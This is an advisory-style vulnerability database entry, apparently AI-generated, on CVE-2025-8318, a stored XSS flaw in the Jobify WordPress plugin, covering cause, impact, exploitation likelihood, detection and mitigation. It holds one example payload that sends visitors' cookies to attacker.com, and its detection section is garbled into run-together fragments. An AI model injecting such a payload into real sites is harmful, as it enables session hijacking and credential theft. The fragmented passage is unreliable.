
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-8318 is a Stored Cross-Site Scripting (XSS) vulnerability in the Jobify plugin for WordPress, affecting all versions up to and including 1.4.4. The flaw exists in the keyword parameter due to insufficient input sanitization and output escaping, allowing authenticated attackers with Contributor-level access or above to inject arbitrary web scripts into pages. It was published on September 11, 2025, and assigned by Wordfence. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), stemming from the Jobify plugin's failure to properly sanitize the keyword parameter before rendering it in page output. An attacker with at least Contributor-level WordPress access can craft a malicious payload in the keyword parameter that gets stored and later executed in the browsers of any user who visits the affected page. The vulnerable code is present in the plugin's Shortcodes.php file (Wordfence, WordPress SVN).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of other users' browsers whenever they visit a page containing the injected payload. This can lead to session hijacking, credential theft, unauthorized actions performed on behalf of victims (including administrators), and potential site defacement. The scope is changed (S:C), meaning the impact extends beyond the attacker's own session to affect other users of the WordPress site (Wordfence).
No public proof-of-concept exploit code or active in-the-wild exploitation has been reported for CVE-2025-8318 as of the available data. The vulnerability requires authenticated access at the Contributor level or above, which limits the attack surface compared to unauthenticated flaws. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>, to be injected via the keyword parameter.keyword parameter, causing it to be stored in the database without proper sanitization.keyword parameter; error logs indicating unexpected JavaScript content in plugin-rendered output.Shortcodes.php or other Jobify plugin files; presence of obfuscated JavaScript in WordPress database post/page content.wp_posts or related tables containing <script> tags or encoded JavaScript within content fields associated with Jobify shortcodes (Wordfence).WordPress site administrators should update the Jobify plugin to a version beyond 1.4.4 that includes a fix for this vulnerability. Until a patched version is available or applied, administrators should restrict Contributor-level user registration and review existing Contributor accounts for suspicious activity. Additionally, deploying a Web Application Firewall (WAF) such as Wordfence can help detect and block XSS exploitation attempts (Wordfence, WordPress Plugin Page).
Wordfence disclosed and assigned this CVE as part of their weekly WordPress vulnerability report for the period of September 8–14, 2025, highlighting it among other plugin vulnerabilities tracked that week (Wordfence Blog). No significant broader media coverage or notable researcher commentary beyond the Wordfence disclosure has been identified for this vulnerability.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."